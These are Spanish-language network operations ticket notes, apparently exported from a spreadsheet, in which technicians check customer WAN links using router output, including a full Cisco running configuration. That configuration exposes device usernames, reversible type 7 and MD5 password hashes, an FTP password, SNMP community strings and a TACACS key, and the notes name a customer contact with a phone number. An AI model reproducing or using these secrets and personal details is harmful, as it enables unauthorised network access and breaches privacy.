*MAY 13 07:51:05.323 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 13 07:51:05.323 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO DOWN
*MAY 13 07:51:05.323 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO DOWN
*MAY 13 07:51:05.327 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO UP
*MAY 13 07:51:34.267 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY 13 07:51:36.631 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.193.65 ON FASTETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0041#
SHOW CLOCK
*08:01:13.459 UTC FRI MAY 13 2022
CC_BANRURAL_GT_AGENCIA_0041#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.193.65            0   DC99.147A.A501  ARPA   FASTETHERNET0/0
INTERNET  10.72.193.91            9   C0FF.A821.F377  ARPA   FASTETHERNET0/0
INTERNET  10.72.193.92            -   A8B1.D489.EE54  ARPA   FASTETHERNET0/0
INTERNET  10.72.193.93            9   3458.40C8.83D1  ARPA   FASTETHERNET0/0
INTERNET  10.72.193.94            9   00D0.D65D.88D8  ARPA   FASTETHERNET0/0
INTERNET  10.72.193.125          10   C0FF.A821.D3FF  ARPA   FASTETHERNET0/0
INTERNET  10.72.193.126           9   00D0.D65A.4DF4  ARPA   FASTETHERNET0/0
INTERNET  10.72.193.129           1   DC99.147A.A501  ARPA   FASTETHERNET0/1
INTERNET  10.72.193.145           -   A8B1.D489.EE55  ARPA   FASTETHERNET0/1
INTERNET  10.130.41.17            -   A8B1.D489.EE54  ARPA   VLAN1
INTERNET  10.130.41.22            0   F08E.DB17.9CFE  ARPA   VLAN1
INTERNET  10.160.41.126           -   A8B1.D489.EE54  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0041#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
FA0/0                          UP             UP       WAN PRINCIPAL/_/8900340T/_/
FA0/1                          UP             UP       WAN REDUNDANTE/_/8901752T/_/
FA0/0/0                        UP             DOWN     LAN DEL CLIENTE
FA0/0/1                        UP             DOWN     LAN DEL CLIENTE
FA0/0/2                        UP             DOWN     LAN DEL CLIENTE
FA0/0/3                        UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0041#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
FASTETHERNET0/0            10.72.193.92    YES NVRAM  UP                    UP
FASTETHERNET0/1            10.72.193.145   YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  UP                    DOWN
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  UP                    DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  UP                    DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  UP                    UP
LOOPBACK5                  10.212.97.169   YES NVRAM  UP                    UP
VLAN1                      10.160.41.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0041#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.72.193.92
  PING 10.72.193.92: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.193.92 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/3 MS
RUTA IP:
PE: 10.179.28.35
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.193.92
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.193.92/32  DIRECT  0    0                 0.0.0.0         VLANIF184</t>
  </si>
  <si>
    <t>F4562013</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA GUADALUPE SANCHEZ PERO INDICA QUE NO ESCUCHA Y CORTA LLAMADA, SE INTENTARA LUEGO **
ID 2001135726
**</t>
  </si>
  <si>
    <t>SE LLEGA CORRECTAMENTE A NIVEL WAN DEL ENLACE NO SE TIENE GESTION DEL CPE PERO SE ENCUENTR OPERATIVO
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -C 1000 -S 1500 -B -M 50 -VPN-INSTANCE  SCOTIA_INT 10.17.99.149
  PING 10.17.99.149: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.17.99.149 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 7/7/15 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;TELNET VPN-INSTANCE  SCOTIA_INT 10.17.99.149            TRYING 10.17.99.149 ...
PRESS CTRL+K TO ABORT
ERROR: FAILED TO CONNECT TO THE REMOTE HOST.
&lt;PPANPAC0N2T1A01A01EID1&gt;
PE 10.179.38.7
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY IP ROUTING-TABLE VPN-INSTANCE  SCOTIA_INT 10.17.99.149
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIA_INT
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
     10.17.96.0/19  EBGP    20   0             RD  10.17.127.125   GIGABITETHERNET1/0/10.1032
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTER GIGABITETHERNET1/0/10.1032
#
INTERFACE GIGABITETHERNET1/0/10.1032
 VLAN-TYPE DOT1Q 1032
 DESCRIPTION ROUTER_SCOTIA-INT_PA
 IP BINDING VPN-INSTANCE SCOTIA_INT
 IP ADDRESS 10.17.127.126 255.255.255.252
 STATISTIC ENABLE
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_200MBPS INBOUND IDENTIFIER NONE
 QOS-PROFILE TRAFSHAP_200MBPS_PB_22 OUTBOUND IDENTIFIER NONE
#
RETURN</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE +52 55 5174 5290 RESPONDE GUADALUPE SANCHEZ MENCIONA QUE YA TIENEN CERRADO EL TICKET INTERNO
-ID 2001206607</t>
  </si>
  <si>
    <t>F4562025</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL .
ROUTER CPE ACTIVO HACE 8 HORAS
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 14-JUN-11 17:44 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M12, RELEASE SOFTWARE (FC1)
IP2071041 UPTIME IS 8 HOURS, 57 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 21:09:03 GMT THU MAY 12 2022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WK
1 DSL CONTROLLER
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX153983WK
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
IP2071041#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4424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071041
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
LOGGING BUFFERED 16384
NO LOGGING CONSOLE
!
AAA NEW-MODEL
!
!
AAA AUTHENTICATION LOGIN DEFAULT GROUP TACACS+ LOCAL
AAA AUTHENTICATION LOGIN CON_ACC GROUP TACACS+ LOCAL NONE
AAA AUTHENTICATION ENABLE DEFAULT GROUP TACACS+ NON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CLOCK TIMEZONE GMT -6 0
!
NO IPV6 CEF
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
IP CEF
!
!
!
!
!
NO IP BOOTP SERVER
NO IP DOMAIN LOOKUP
IP DOMAIN NAME TELECOM.COM.SV
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX153983WK
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 09581D05175514405B5C5C
USERNAME ADMIN PRIVILEGE 15 SECRET 5 $1$CFQA$ZE2OJW8UH22UTUZAAZHHY.
!
!
CONTROLLER SHDSL 0/1/0
 DSL-GROUP 0 PAIRS  0
  SHDSL ANNEX A-B
  SHDSL RATE AUTO
 !
!
IP TCP SYNWAIT-TIME 10
IP FTP USERNAME TELECOM-USR
IP FTP PASSWORD 7 051F0303244F410454302420
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.0.232 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2071041SV/_/
 BANDWIDTH 3072
 IP ADDRESS 10.154.71.82 255.255.255.248
 RATE-LIMIT INPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK NON-BROADCAST
 IP OSPF PRIORITY 0
 IP OSPF MTU-IGNORE
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.96.0.106 255.255.255.252
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE ATM0/1/0
 NO IP ADDRESS
 NO ATM ILMI-KEEPALIVE
!
ROUTER OSPF 160
 ROUTER-ID 10.154.71.82
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 1 SUBNETS
 NETWORK 10.154.71.80 0.0.0.7 AREA 0
 NEIGHBOR 10.154.71.81 PRIORITY 254
!
ROUTER OSPF 1
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 160 SUBNETS
 NETWORK 22.96.0.104 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
 DISTANCE 100
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER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SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
TACACS-SERVER KEY 7 15052B5D090A3930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PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
NTP SERVER 10.130.234.177
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
END
IP2071041#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156 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 160 MESSAGE LINES LOGGED
LOG BUFFER (16384 BYTES):
NOWN)
MAY 12 21:12:00.117 GMT: %AAA-3-DROPACCTFAIL: ACCOUNTING RECORD DROPPED, SEND TO SERVER FAILED: SYSTEM
MAY 12 21:12:00.117 GMT: %SNMP-5-COLDSTART: SNMP AGENT ON HOST IP2071041 IS UNDERGOING A COLD START
MAY 12 21:12:32.129 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.154.71.81 ON GIGABITETHERNET0/0 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 21:12:35.041 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.154.71.81 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
MAY 12 21:12:47.701 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 12 21:12:48.701 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 12 21:13:29.258 GMT: %OSPF-5-ADJCHG: PROCESS 1, NBR 22.96.223.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
MAY 12 21:14:35.466 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 21:19:08.673 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS AUTHENTICATION SERVER TYPE TACACS+ (UNKNOWN)
MAY 12 21:19:44.341 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 21:20:15.441 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS ACCOUNTING SERVER TYPE TACACS+ (UNKNOWN)
MAY 12 21:24:53.308 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 21:30:02.263 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 21:35:10.914 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 21:40:19.757 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 21:45:28.483 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 21:50:37.418 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 21:55:46.209 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:00:54.836 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:06:03.607 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:11:12.270 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:16:21.013 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:21:29.387 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:26:38.038 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:31:46.801 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:36:55.676 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:42:04.119 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:47:12.534 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:52:21.493 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 22:57:30.455 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:02:39.218 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:07:47.873 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:12:56.604 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:18:05.063 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:23:13.714 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:28:22.541 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:33:31.251 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:38:39.978 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:43:48.709 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:48:57.204 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:54:05.819 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 12 23:59:14.502 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:04:23.141 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:09:31.859 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:14:40.574 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:19:49.353 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:24:58.184 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:30:06.895 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:35:15.566 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:40:24.341 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:45:32.847 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:50:41.454 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 00:55:50.169 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:00:58.780 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:06:07.431 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:11:16.234 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:16:25.033 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:21:33.903 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:26:42.770 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:31:51.613 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:37:00.452 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:42:09.271 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:47:17.738 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:52:26.473 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 01:57:35.299 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:02:44.014 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:07:52.489 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:13:01.164 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:18:10.027 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:23:18.538 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:28:27.364 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:33:36.103 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:38:44.846 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:43:53.493 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
MAY 13 02:49:02.100 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/1/0 DSL-GROUP(0) STATE CHANGED TO ADMINISTRATIVELY DOWN.
